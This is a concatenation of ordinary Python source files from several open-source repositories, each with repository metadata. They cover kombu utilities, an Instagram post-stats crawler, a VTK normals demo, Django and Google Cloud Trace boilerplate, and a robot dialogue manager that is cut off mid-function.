    ``name`` is the full dotted path to the object, e.g.
    ``modulename.ClassName`` (or ``modulename:ClassName`` with a colon
    separator).  Short names may first be expanded through the
    ``aliases`` mapping.  Non-string names are returned unchanged, and
    ``default`` — when given — is returned instead of raising on
    import or attribute errors.
    """
    if imp is None:
        imp = importlib.import_module
    if not isinstance(name, string_t):
        return name  # already a class
    name = aliases.get(name) or name
    # A colon always wins as module/attribute separator.
    if ':' in name:
        sep = ':'
    module_name, _, cls_name = name.rpartition(sep)
    if not module_name:
        # Bare name: look it up inside `package`, or treat the name
        # itself as the module.
        cls_name, module_name = None, package if package else cls_name
    try:
        try:
            module = imp(module_name, package=package, **kwargs)
        except ValueError as exc:
            reraise(ValueError,
                    ValueError("Couldn't import {0!r}: {1}".format(name, exc)),
                    sys.exc_info()[2])
        return getattr(module, cls_name) if cls_name else module
    except (ImportError, AttributeError):
        if default is None:
            raise
        return default
class HashedSeq(list):
    """A list whose hash is computed once, at construction time.

    Avoids recomputing hash() for the same sequence over and over.
    """
    __slots__ = 'hashvalue'

    def __init__(self, *seq):
        self.extend(seq)
        self.hashvalue = hash(seq)

    def __hash__(self):
        return self.hashvalue
def eqhash(o):
    """Return ``o.__eqhash__()`` when available, else ``hash(o)``.

    Note: an AttributeError raised *inside* ``__eqhash__`` also
    triggers the ``hash(o)`` fallback.
    """
    try:
        return o.__eqhash__()
    except AttributeError:
        return hash(o)
class EqualityDict(dict):
    """Dict that keys entries by ``eqhash(key)`` instead of ``hash(key)``."""

    def __getitem__(self, key):
        h = eqhash(key)
        if h in self:
            return dict.__getitem__(self, h)
        return self.__missing__(key)

    def __setitem__(self, key, value):
        return dict.__setitem__(self, eqhash(key), value)

    def __delitem__(self, key):
        return dict.__delitem__(self, eqhash(key))
def say(m, *fargs, **fkwargs):
    """Format *m* with the given arguments and write it to stderr."""
    text = str(m).format(*fargs, **fkwargs)
    print(text, file=sys.stderr)
def uuid4():
    """uuid.uuid4 with a workaround for http://bugs.python.org/issue4607."""
    if ctypes and _uuid_generate_random:  # pragma: no cover
        # Fill 16 random bytes via libuuid directly.
        buf = ctypes.create_string_buffer(16)
        _uuid_generate_random(buf)
        return UUID(bytes=buf.raw)
    return _uuid4()
def uuid():
    """Return a new unique id as a string.

    Backed by :func:`uuid.uuid4`, so collisions are - hopefully -
    vanishingly unlikely.
    """
    return str(uuid4())
gen_unique_id = uuid
if sys.version_info >= (2, 6, 5):
    def kwdict(kwargs):
        """Pass-through: keyword dicts need no fixing on this version."""
        return kwargs
else:
    def kwdict(kwargs):  # pragma: no cover  # noqa
        """Encode keyword argument names to byte strings.

        Works around http://bugs.python.org/issue4978 on Python
        < 2.6.5, where keyword names must not be unicode.
        """
        return dict((key.encode('utf-8'), value)
                    for key, value in items(kwargs))
def maybe_list(v):
    """Coerce *v* to list form: None -> [], iterable -> itself, else [v]."""
    if v is None:
        return []
    return v if hasattr(v, '__iter__') else [v]
def fxrange(start=1.0, stop=None, step=1.0, repeatlast=False):
    """Yield floats from *start*, increasing by *step*, up to *stop*.

    With a falsy *stop* the series is endless; with ``repeatlast=True``
    the final value is repeated forever instead of stopping.
    """
    cur = start * 1.0
    while 1:
        if stop and cur > stop:
            if not repeatlast:
                break
            yield cur - step
        else:
            yield cur
            cur += step
def fxrangemax(start=1.0, stop=None, step=1.0, max=100.0):
    """Yield floats from *start* by *step* (capped at *stop*), stopping
    once the running total of the successive values reaches *max*."""
    total = 0
    cur = start * 1.0
    while total < max:
        yield cur
        # The next value is capped at *stop* when one is given.
        cur = min(cur + step, stop) if stop else cur + step
        total += cur
def retry_over_time(fun, catch, args=[], kwargs={}, errback=None,
                    max_retries=None, interval_start=2, interval_step=2,
                    interval_max=30, callback=None):
    """Retry the function over and over until max retries is exceeded.

    For each retry we sleep a for a while before we try again, this interval
    is increased for every retry until the max seconds is reached.

    :param fun: The function to try
    :param catch: Exceptions to catch, can be either tuple or a single
        exception class.
    :keyword args: Positional arguments passed on to the function.
    :keyword kwargs: Keyword arguments passed on to the function.
    :keyword errback: Callback for when an exception in ``catch`` is raised.
        The callback must take two arguments: ``exc`` and ``interval``, where
        ``exc`` is the exception instance, and ``interval`` is the time in
        seconds to sleep next..
    :keyword max_retries: Maximum number of retries before we give up.
        If this is not set, we will retry forever.
    :keyword interval_start: How long (in seconds) we start sleeping between
        retries.
    :keyword interval_step: By how much the interval is increased for each
        retry.
    :keyword interval_max: Maximum number of seconds to sleep between retries.
    """
    retries = 0
    # Backoff series; repeatlast=True keeps yielding the cap forever.
    interval_range = fxrange(interval_start,
                             interval_max + interval_start,
                             interval_step, repeatlast=True)
    for retries in count():
        try:
            return fun(*args, **kwargs)
        except catch as exc:
            if max_retries and retries >= max_retries:
                raise
            if callback:
                callback()
            # errback (when given) decides the next sleep interval,
            # otherwise the backoff range does.
            tts = float(errback(exc, interval_range, retries) if errback
                        else next(interval_range))
            if tts:
                # Sleep in 1-second slices so `callback` keeps firing.
                for _ in range(int(tts)):
                    if callback:
                        callback()
                    sleep(1.0)
                # sleep remainder after int truncation above.
                sleep(abs(int(tts) - tts))
def emergency_dump_state(state, open_file=open, dump=None):
    """Dump *state* to a uniquely named temporary file; return its path.

    Tries ``dump`` (default: ``pickle.dump``); if the state cannot be
    pickled, falls back to writing ``pprint.pformat`` output.
    """
    from pprint import pformat
    from tempfile import mkstemp
    import os
    if dump is None:
        import pickle
        dump = pickle.dump
    # FIX: mktemp() is race-prone (the name can be hijacked between
    # name generation and open).  mkstemp() creates the file securely;
    # close the fd and reopen via `open_file` to keep that hook working.
    fd, persist = mkstemp()
    os.close(fd)
    say('EMERGENCY DUMP STATE TO FILE -> {0} <-', persist)
    fh = open_file(persist, 'w')
    try:
        try:
            dump(state, fh, protocol=0)
        except Exception as exc:
            say('Cannot pickle state: {0!r}. Fallback to pformat.', exc)
            fh.write(default_encode(pformat(state)))
    finally:
        fh.flush()
        fh.close()
    return persist
class cached_property(object):
    """Property descriptor that caches the return value of its getter.

    The wrapped method runs once per instance; the result is stored in
    the instance ``__dict__`` under the property name and returned from
    there on later accesses.  Optional setter/deleter hooks may
    transform the stored value::

        @cached_property
        def connection(self):
            return Connection()

        @connection.setter  # Prepares stored value
        def connection(self, value):
            if value is None:
                raise TypeError('Connection must be a connection')
            return value

        @connection.deleter
        def connection(self, value):
            # Additional action to do at del(self.attr)
            if value is not None:
                print('Connection {0!r} deleted'.format(value))
    """

    def __init__(self, fget=None, fset=None, fdel=None, doc=None):
        self._fget = fget
        self._fset = fset
        self._fdel = fdel
        self.__doc__ = doc or fget.__doc__
        self.__name__ = fget.__name__
        self.__module__ = fget.__module__

    def __get__(self, obj, type=None):
        if obj is None:
            return self
        try:
            return obj.__dict__[self.__name__]
        except KeyError:
            value = obj.__dict__[self.__name__] = self._fget(obj)
            return value

    def __set__(self, obj, value):
        if obj is None:
            return self
        # The setter hook may transform the value before it is cached.
        if self._fset is not None:
            value = self._fset(obj, value)
        obj.__dict__[self.__name__] = value

    def __delete__(self, obj):
        if obj is None:
            return self
        try:
            value = obj.__dict__.pop(self.__name__)
        except KeyError:
            pass
        else:
            if self._fdel is not None:
                self._fdel(obj, value)

    def setter(self, fset):
        return self.__class__(self._fget, fset, self._fdel)

    def deleter(self, fdel):
        return self.__class__(self._fget, self._fset, fdel)
def reprkwargs(kwargs, sep=', ', fmt='{0}={1}'):
    """Format a mapping as ``key=safe_repr(value)`` pairs joined by *sep*."""
    pairs = (fmt.format(k, _safe_repr(v)) for k, v in items(kwargs))
    return sep.join(pairs)
def reprcall(name, args=(), kwargs={}, sep=', '):
    """Format a human-readable call signature, e.g. ``f(1, x=2)``."""
    argstr = sep.join(map(_safe_repr, args or ()))
    kwargstr = reprkwargs(kwargs, sep)
    joiner = sep if (args and kwargs) else ''
    return '{0}({1}{2}{3})'.format(name, argstr, joiner, kwargstr)
@contextmanager
def nested(*managers):  # pragma: no cover
    # flake8: noqa
    """Combine multiple context managers into a single nested
    context manager."""
    exits = []
    vars = []
    exc = (None, None, None)
    try:
        try:
            # Enter each manager in order, remembering the exits so we
            # can unwind the ones already entered if a later one fails.
            for mgr in managers:
                exit = mgr.__exit__
                enter = mgr.__enter__
                vars.append(enter())
                exits.append(exit)
            yield vars
        except:
            exc = sys.exc_info()
        finally:
            # Unwind in reverse order; a true return from __exit__
            # swallows the current exception.
            while exits:
                exit = exits.pop()
                try:
                    if exit(*exc):
                        exc = (None, None, None)
                except:
                    exc = sys.exc_info()
            if exc != (None, None, None):
                # Don't rely on sys.exc_info() still containing
                # the right information. Another exception may
                # have been raised and caught by an exit method
                reraise(exc[0], exc[1], exc[2])
    finally:
        del(exc)
def shufflecycle(it):
    """Endlessly yield the first element of *it* after reshuffling.

    The input is copied up front, so the caller's sequence is never
    mutated.
    """
    pool = list(it)  # don't modify callers list
    while 1:
        random.shuffle(pool)
        yield pool[0]
def entrypoints(namespace):
    """Iterate ``(entrypoint, loaded_object)`` pairs for *namespace*.

    Lazily loads each entry point; yields nothing at all when
    setuptools' ``pkg_resources`` is not installed.
    """
    try:
        from pkg_resources import iter_entry_points
    except ImportError:
        # No setuptools: behave like an empty namespace.
        return iter([])
    return ((entrypoint, entrypoint.load())
            for entrypoint in iter_entry_points(namespace))
class ChannelPromise(object):
    """Lazily evaluate a zero-argument callable, caching the result.

    The wrapped *contract* runs at most once — on the first call —
    and every later call returns the memoized value.
    """

    def __init__(self, contract):
        self.__contract__ = contract

    def __call__(self):
        try:
            return self.__value__
        except AttributeError:
            pass
        # First call: evaluate and memoize.
        result = self.__contract__()
        self.__value__ = result
        return result

    def __repr__(self):
        if hasattr(self, '__value__'):
            return repr(self.__value__)
        return '<promise: 0x{0:x}>'.format(id(self.__contract__))
def escape_regex(p, white=''):
    """Backslash-escape every non-alphanumeric character of *p*.

    Characters listed in *white* are left untouched, and a NUL
    character is rendered as the octal escape ``\\000``.
    """
    escaped = []
    for ch in p:
        if ch.isalnum() or ch in white:
            escaped.append(ch)
        elif ch == '\000':
            escaped.append('\\000')
        else:
            escaped.append('\\' + ch)
    return ''.join(escaped)
def fileno(f):
    """Return *f* unchanged if it is already an integer file
    descriptor, otherwise delegate to ``f.fileno()``."""
    if not isinstance(f, numbers.Integral):
        return f.fileno()
    return f
def maybe_fileno(f):
    """Get object fileno, or :const:`None` if not defined."""
    try:
        return fileno(f)
    except FILENO_ERRORS:
        # No usable descriptor on this object.
        return None
|
{
"content_hash": "6436a0489ecaaec3b27ea77448a163c3",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 28.286666666666665,
"alnum_prop": 0.5640663052871396,
"repo_name": "johankaito/fufuka",
"id": "0745ddfef7bf4e5f8fb4c96be88df0839c7bac08",
"size": "12729",
"binary": false,
"copies": "20",
"ref": "refs/heads/master",
"path": "microblog/flask/venv/lib/python2.7/site-packages/kombu/utils/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "70167"
},
{
"name": "C",
"bytes": "993849"
},
{
"name": "C++",
"bytes": "4924114"
},
{
"name": "CSS",
"bytes": "57195"
},
{
"name": "Fortran",
"bytes": "10375"
},
{
"name": "HTML",
"bytes": "3832217"
},
{
"name": "Java",
"bytes": "608432"
},
{
"name": "JavaScript",
"bytes": "48304"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "575902"
},
{
"name": "Python",
"bytes": "41068291"
},
{
"name": "Shell",
"bytes": "952977"
},
{
"name": "XSLT",
"bytes": "46584"
}
],
"symlink_target": ""
}
|
"""Goes through all usernames and collects their information"""
import sys
import arrow
from selenium.common.exceptions import NoSuchElementException
from util.account import login
from util.chromedriver import SetupBrowserEnvironment
from util.extractor import extract_information
from util.extractor_posts import InstagramPost
from util.exceptions import PageNotFound404, NoInstaPostPageFound
from util.settings import Settings
# Point the crawler at the system-installed chromedriver binary.
Settings.chromedriver_location = '/usr/bin/chromedriver'
def get_posts_from_username(username, caption, limit_amount):
    """Collect stats for a user's posts whose caption contains *caption*.

    Scrapes up to *limit_amount* posts for *username* and returns a
    list of per-post stat dicts stamped with the current US/Pacific
    check time.
    """
    with SetupBrowserEnvironment() as browser:
        ig_stats, _ = extract_information(browser, username, limit_amount)
        checked_at = arrow.now('US/Pacific')
        matching_posts = []
        for post in ig_stats.posts:
            post_caption = post['caption']
            # Keep only posts whose caption mentions the target string.
            if caption not in post_caption:
                continue
            matching_posts.append({
                'username': username,
                'post_url': post['url'],
                'likes': post['likes']['count'],
                'views': post['views'],
                'caption': post_caption,
                'checked_date': checked_at.format('MM-DD-YYYY'),
                'checked_time': checked_at.format('hh:mm:ss A'),
                'still_up': True,
            })
        return matching_posts
def get_post_from_url(post_url):
    """Return a one-element list of stats for the post at *post_url*.

    When the post page no longer exists, the entry records only the
    URL, the check timestamp, and ``'still_up': False``.
    """
    with SetupBrowserEnvironment() as browser:
        checked_at = arrow.now('US/Pacific')
        stamp = {
            'checked_date': checked_at.format('MM-DD-YYYY'),
            'checked_time': checked_at.format('hh:mm:ss A'),
        }
        try:
            post = InstagramPost(browser, post_url)
            post.extract_post_info()
        except NoInstaPostPageFound:
            # Page is gone: record the post as taken down.
            result = dict(stamp, post_url=post_url, still_up=False)
        else:
            result = dict(stamp,
                          username=post.username,
                          post_url=post_url,
                          likes=post.likes,
                          views=post.views,
                          caption=post.caption,
                          still_up=True)
        return [result]
|
{
"content_hash": "a292a31ebf1923f9a6a7579fe4e627b1",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 74,
"avg_line_length": 35.544117647058826,
"alnum_prop": 0.5771617707902358,
"repo_name": "timgrossmann/instagram-profilecrawl",
"id": "405c3cfea34a52afa79bff9852b8046c70ce94a1",
"size": "2442",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quickstart_templates/parse_instagram.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "1223"
},
{
"name": "Python",
"bytes": "68413"
},
{
"name": "Shell",
"bytes": "1860"
}
],
"symlink_target": ""
}
|
from swf.actors.core import Actor # NOQA
from swf.actors.worker import ActivityWorker # NOQA
from swf.actors.decider import Decider # NOQA
|
{
"content_hash": "dee69147105a7cdb2af9aeb3227ae3bb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 52,
"avg_line_length": 47.333333333333336,
"alnum_prop": 0.7887323943661971,
"repo_name": "botify-labs/simpleflow",
"id": "3b06f79cac45b62433faf83fea118029254f12b3",
"size": "166",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "swf/actors/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "298"
},
{
"name": "Python",
"bytes": "801698"
},
{
"name": "Shell",
"bytes": "4481"
}
],
"symlink_target": ""
}
|
"""
"""
import vtk
def main():
    """Render the input model three ways to compare normal generation.

    Left viewport: no point normals. Middle: point normals without
    edge splitting. Right: point normals with sharp edges split.
    All three viewports share one camera.
    """
    colors = vtk.vtkNamedColors()
    fileName = get_program_parameters()
    polyData = ReadPolyData(fileName)
    # (Removed a stray vtkRenderer that was created, given a background,
    # and then never added to the render window — dead code.)
    # Create background colors for each viewport.
    backgroundColors = list()
    backgroundColors.append(colors.GetColor3d("Cornsilk"))
    backgroundColors.append(colors.GetColor3d("NavajoWhite"))
    backgroundColors.append(colors.GetColor3d("Tan"))
    # Create a renderer for each view port.
    ren = list()
    ren.append(vtk.vtkRenderer())
    ren.append(vtk.vtkRenderer())
    ren.append(vtk.vtkRenderer())
    ren[0].SetViewport(0, 0, 1.0 / 3.0, 1)  # Input
    ren[1].SetViewport(1.0 / 3.0, 0, 2.0 / 3.0, 1)  # Normals (no split)
    ren[2].SetViewport(2.0 / 3.0, 0, 1, 1)  # Normals (split)
    # Shared camera keeps all three viewports in sync.
    camera = vtk.vtkCamera()
    normals = vtk.vtkPolyDataNormals()
    normals.SetInputData(polyData)
    normals.SetFeatureAngle(30.0)
    for i in range(0, 3):
        # Configure the normals filter differently per viewport.
        if i == 0:
            normals.ComputePointNormalsOff()
        elif i == 1:
            normals.ComputePointNormalsOn()
            normals.SplittingOff()
        else:
            normals.ComputePointNormalsOn()
            normals.SplittingOn()
        normals.Update()
        # Deep-copy the filter output so each viewport keeps its own
        # result after the filter is reconfigured.
        normalsPolyData = vtk.vtkPolyData()
        normalsPolyData.DeepCopy(normals.GetOutput())
        # mapper
        mapper = vtk.vtkPolyDataMapper()
        mapper.SetInputData(normalsPolyData)
        mapper.ScalarVisibilityOff()
        actor = vtk.vtkActor()
        actor.SetMapper(mapper)
        actor.GetProperty().SetDiffuseColor(colors.GetColor3d("Peacock"))
        actor.GetProperty().SetDiffuse(.7)
        actor.GetProperty().SetSpecularPower(20)
        actor.GetProperty().SetSpecular(.5)
        # add the actor
        ren[i].SetBackground(backgroundColors[i])
        ren[i].SetActiveCamera(camera)
        ren[i].AddActor(actor)
    # Render window.
    renwin = vtk.vtkRenderWindow()
    renwin.AddRenderer(ren[0])
    renwin.AddRenderer(ren[1])
    renwin.AddRenderer(ren[2])
    # An interactor.
    interactor = vtk.vtkRenderWindowInteractor()
    interactor.SetRenderWindow(renwin)
    renwin.SetSize(900, 300)
    ren[0].GetActiveCamera().SetFocalPoint(0, 0, 0)
    ren[0].GetActiveCamera().SetPosition(1, 0, 0)
    ren[0].GetActiveCamera().SetViewUp(0, 0, -1)
    ren[0].ResetCamera()
    ren[0].GetActiveCamera().Azimuth(120)
    ren[0].GetActiveCamera().Elevation(30)
    ren[0].GetActiveCamera().Dolly(1.1)
    ren[0].ResetCameraClippingRange()
    renwin.Render()
    ren[0].ResetCamera()
    renwin.Render()
    # Start.
    interactor.Initialize()
    interactor.Start()
def get_program_parameters():
    """Parse the command line and return the input geometry file name."""
    import argparse
    description = 'Surface normal generation.'
    epilogue = '''
    (a) Faceted model without normals.
    (b) Polygons must be consistently oriented to accurately compute normals.
    (c) Sharp edges are poorly represented using shared normals as shown on the corners of this model.
    (d) Normal generation with sharp edges split.
   '''
    arg_parser = argparse.ArgumentParser(
        description=description, epilog=epilogue,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    arg_parser.add_argument('filename1', help='42400-IDGH.stl.')
    return arg_parser.parse_args().filename1
def ReadPolyData(file_name):
    """Read polygonal data from *file_name*, dispatching on extension.

    Supported extensions: .ply, .vtp, .obj, .stl, .vtk and .g (BYU).

    :param file_name: Path to the geometry file.
    :return: A vtkPolyData instance, or None for an unknown extension.
    """
    import os
    path, extension = os.path.splitext(file_name)
    extension = extension.lower()
    # BUG FIX: the original instantiated the non-existent classes
    # vtk.vtkXMLpoly_dataReader / vtk.vtkpoly_dataReader (a botched
    # rename of vtkXMLPolyDataReader / vtkPolyDataReader), so reading
    # .vtp and .vtk files raised AttributeError.
    readers = {
        ".ply": vtk.vtkPLYReader,
        ".vtp": vtk.vtkXMLPolyDataReader,
        ".obj": vtk.vtkOBJReader,
        ".stl": vtk.vtkSTLReader,
        ".vtk": vtk.vtkPolyDataReader,
        ".g": vtk.vtkBYUReader,
    }
    if extension not in readers:
        # Return a None if the extension is unknown.
        return None
    reader = readers[extension]()
    if extension == ".g":
        # The BYU reader uses a different file-name setter.
        reader.SetGeometryFileName(file_name)
    else:
        reader.SetFileName(file_name)
    reader.Update()
    return reader.GetOutput()
# Run the demo when invoked as a script.
if __name__ == '__main__':
    main()
|
{
"content_hash": "12608c626187afc32d261238087232c4",
"timestamp": "",
"source": "github",
"line_count": 158,
"max_line_length": 102,
"avg_line_length": 29.949367088607595,
"alnum_prop": 0.635883347421809,
"repo_name": "lorensen/VTKExamples",
"id": "5d722bc3e513765a1644a81c937b0f8800da02a1",
"size": "4755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Python/Visualization/NormalsDemo.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "322226"
},
{
"name": "C++",
"bytes": "4187688"
},
{
"name": "CMake",
"bytes": "155244"
},
{
"name": "CSS",
"bytes": "556"
},
{
"name": "G-code",
"bytes": "377583"
},
{
"name": "GLSL",
"bytes": "5375"
},
{
"name": "HTML",
"bytes": "635483160"
},
{
"name": "Java",
"bytes": "629442"
},
{
"name": "JavaScript",
"bytes": "18199"
},
{
"name": "Python",
"bytes": "1376010"
},
{
"name": "Shell",
"bytes": "3481"
}
],
"symlink_target": ""
}
|
"""mike URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
# Only the Django admin is routed for now.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
]
|
{
"content_hash": "f5fb496d5ef7241079309a4d05233746",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 79,
"avg_line_length": 36.23809523809524,
"alnum_prop": 0.6990801576872536,
"repo_name": "N0stack/mike",
"id": "92f541de9823b8aab15a6845f5f31729818bac16",
"size": "761",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/mike/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53041"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import sys
from google.api_core.protobuf_helpers import get_messages
from google.api import http_pb2
from google.cloud.trace_v1.proto import trace_pb2
from google.protobuf import descriptor_pb2
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
# Protobuf modules shared across Google Cloud clients.
_shared_modules = [http_pb2, descriptor_pb2, empty_pb2, timestamp_pb2]
# Protobuf modules specific to the Trace v1 API.
_local_modules = [trace_pb2]
names = []
# Re-export every message class from the shared modules as attributes
# of this module.
for module in _shared_modules:
    for name, message in get_messages(module).items():
        setattr(sys.modules[__name__], name, message)
        names.append(name)
# Local messages additionally get __module__ rewritten so they present
# as members of this types module.
for module in _local_modules:
    for name, message in get_messages(module).items():
        message.__module__ = "google.cloud.trace_v1.types"
        setattr(sys.modules[__name__], name, message)
        names.append(name)
__all__ = tuple(sorted(names))
|
{
"content_hash": "01410947bad1dccf6b86ecb5aa9c97db",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 70,
"avg_line_length": 30.5,
"alnum_prop": 0.7142857142857143,
"repo_name": "dhermes/gcloud-python",
"id": "bb7c6a2415566149645d785a0aa835d67216e6c8",
"size": "1456",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "trace/google/cloud/trace_v1/types.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "95635"
},
{
"name": "Python",
"bytes": "2871895"
},
{
"name": "Shell",
"bytes": "4683"
}
],
"symlink_target": ""
}
|
import os,sys,random,time,pickle,string
#import pyaudio
#import wave
class dialogue_manager:
	def __init__(self, pta, path_to_experiment, path_to_spf, given_words, log_filename, run_offline, alog_filename=None, poll_filename=None, push_filename=None, core_filename=None, session_id=None):
		"""Set up the dialogue manager's tools, state, and tunable parameters.

		pta -- helper used to translate parses into ASP nodes (see
		       get_apr_tuple_from_asp_node / process_user_initiative_response)
		path_to_experiment -- SPF experiment directory used by parse_utterance
		path_to_spf -- path to the SPF parser jar
		given_words -- map from lexicon word to grounded-referent info;
		               entry [1] is the grounded term (see new_given_words)
		log_filename -- dialogue log appended to by vocalize/get_user_input
		run_offline -- if True, operate step-wise through poll/push/core files
		"""
		#input types
		self.vocalize_with_TTS = False
		self.input_with_ASR = False
		#manager tools
		self.pta = pta
		self.path_to_experiment = path_to_experiment
		self.path_to_spf = path_to_spf
		self.known_words = given_words
		self.new_given_words(given_words)
		self.log_filename = log_filename
		self.run_offline = run_offline #if running offline, operations happen step-wise instead of continuously between user inputs (ie system shuts down)
		self.alog_filename = alog_filename
		self.poll_filename = poll_filename
		self.push_filename = push_filename
		self.core_filename = core_filename
		self.session_id = session_id
		# Responses buffered here are flushed to the push file on shutdown.
		self.responses_from_robot = []
		#manager state information
		self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #action, patient, recipient triple and their confidences
		self.current_asp_confidence = [{},{},{}] #distributions of confidence over possible grounded referents
		self.asp_role_map = {"action":0,"patient":1,"recipient":2}
		self.request_type = "user_initiative" #can also be system-initiative,terminate
		self.role_requested = None #if system-initiative request, this holds the role requested from the user
		self.last_apr = None
		self.last_role_requested = None #these two together form the previous state chosen by the dialogue manager
		#self.all_unmapped_words = {} #to be used during clarification dialogues and for retraining ontology
		self.utterance_parse_pairs = [] #to be used during retraining
		self.roles_relatively_confident_about = None
		#local state information for the dialogue
		self.utterances_for_goal = [] #local utterances used during current dialogue to describe high-level, open-ended goal (cleared each time new dialogue starts)
		self.utterances_for_clarification = [] #used in alignment guesses but need to be kept separate from main goal utterances and other clarification sub-dialogue utterances
		self.utterances_during_dialogue = {} #indexed by request type (goal, sentence component), contains lists of utterances used to describe same goal/component for re-training
		self.dialogue_accepted_parses = {} #indexed by request type (goal, sentence component), contains parse chosen as correct for that request
		#self.unmapped_words_from_utterances = [] #unmapped words from utterances in current dialogue (wrapped into all unmapped words structure at dialogue's end)
		#manager classification parameters
		self.utterance_class_keywords = {}
		self.utterance_class_keywords["yes"] = ["yes","yeah","sure","right","correct"]
		self.utterance_class_keywords["no"] = ["no","nope","incorrect","wrong","not right"]
		self.utterance_class_keywords["nevermind"] = ["nevermind","wrong","misunderstood","don't","dont","nothing"]
		#manager adjustable / learnable parameters
		self.max_asr_understandings_to_consider = 4
		self.min_confidence_to_accept = 0.95 #when all arguments of understanding meet this confidence, dialogue terminates
		self.confidence_decay_rate = 0.5 #every time the user gives a free response for a command and a past argument is not mentioned again, decay its confidence by this rate
#write core elements to a pickle file indexed by session ID, then shut down
def write_core_elements_to_pickle_and_shutdown(self):
#write core
f = open(self.core_filename,'wb')
pickle.dump([self.current_asp_confidence,self.request_type,self.role_requested,self.last_apr,self.last_role_requested,self.roles_relatively_confident_about,self.current_best_asp_understanding,self.utterances_for_goal,self.utterances_for_clarification,self.utterances_during_dialogue,self.dialogue_accepted_parses],f)
f.close()
#shutdown
f = open(self.push_filename,'w')
f.write("\n".join(self.responses_from_robot)+"\n")
f.close()
self.responses_from_robot = []
sys.exit()
#load core elements from a pickle file indexed by session ID
def load_core_elements_from_pickle(self):
f = open(self.core_filename,'rb')
[self.current_asp_confidence,self.request_type,self.role_requested,self.last_apr,self.last_role_requested,self.roles_relatively_confident_about,self.current_best_asp_understanding,self.utterances_for_goal,self.utterances_for_clarification,self.utterances_during_dialogue,self.dialogue_accepted_parses] = pickle.load(f)
f.close()
#load a mapping from grounded terms to lexicon referring expressions from given word map
def new_given_words(self, given_words):
self.grounded_to_lexicon_map = {}
for w in given_words:
key = given_words[w][1].strip()
if (key in self.grounded_to_lexicon_map):
self.grounded_to_lexicon_map[key].append(w)
else:
self.grounded_to_lexicon_map[key] = [w]
#some boilerplate; max_argmax function
def max_argmax(self,d):
m = None
for key in d:
if (m == None):
m = key
if (d[key] > d[m]):
m = key
if (m == None):
return 0, None
else:
return d[m], m
	#boilerplate; dict add function adds all elements of dict B to dict A
	def dict_add(self,A,B):
		# Merge B into A in place: list values are extended (copied when
		# the key is new to A), int values are summed; any other value
		# type is reported as unsupported and skipped.
		for key in B:
			if (type(B[key]) is list):
				if (key in A):
					A[key].extend(B[key])
				else:
					A[key] = B[key][:]
			elif (type(B[key]) is int):
				if (key in A):
					A[key] += B[key]
				else:
					A[key] = B[key]
			else:
				print "dict_add:\tunsupported element type '"+str(type(B[key]))+"'"
	#show text and/or render speech to the user
	def vocalize(self, response, text=None, request_type=None, role_requested=None):
		"""Show (and optionally speak) a robot response, buffer it for the
		push file, and append a ROBOT line to the dialogue log.

		text -- force text-only output; defaults to not vocalize_with_TTS.
		request_type/role_requested -- logged values; default to current state.
		"""
		if (text == None):
			text = not self.vocalize_with_TTS
		if (text == True):
			print "ROBOT: "+response
		else:
			print "ROBOT: "+response
			# NOTE(review): response is interpolated into a shell command
			# unescaped — a quote in the response breaks/injects the command.
			os.system("/usr/share/speak \""+response+"\"")
		if (request_type == None):
			request_type = self.request_type
		if (role_requested == None):
			role_requested = self.role_requested
		self.responses_from_robot.append(response)
		f = open(self.log_filename,'a')
		f.write("\t".join(["ROBOT",response,str(self.current_asp_confidence),str(self.roles_relatively_confident_about),str(request_type),str(role_requested)])+"\n")
		f.close()
	#choose a referring expression given a grounded term
	def choose_referring_expression(self, gw, words_to_avoid=''):
		"""Pick a lexicon expression for grounded term *gw*, preferring one
		not already present in the string *words_to_avoid*."""
		#don't throw errors if we get bad input; just send it back since it's not going to be verbalized anyway
		if (gw == None or gw == False):
			return None
		#if the gw is a digit, we just return that
		if (gw.isdigit() == True):
			return gw
		#select the first referring expression not contained in the string of words to avoid
		chosen_expression = None
		for i in range(0,len(self.grounded_to_lexicon_map[gw])):
			if (self.grounded_to_lexicon_map[gw][i] not in words_to_avoid):
				# NOTE(review): there is no break here, so the LAST
				# non-avoided expression wins even though the comment
				# above says "first" — confirm which is intended.
				chosen_expression = self.grounded_to_lexicon_map[gw][i]
		#if the vocalization chosen is "me" or "i" from the ontology, we need to flip the POV for the pronoun
		if (chosen_expression == "me" or chosen_expression == "i"):
			chosen_expression = "you"
		#if we arrive here, then all the referring expressions for grounded term are in the words to avoid, so just take the first
		if (chosen_expression == None):
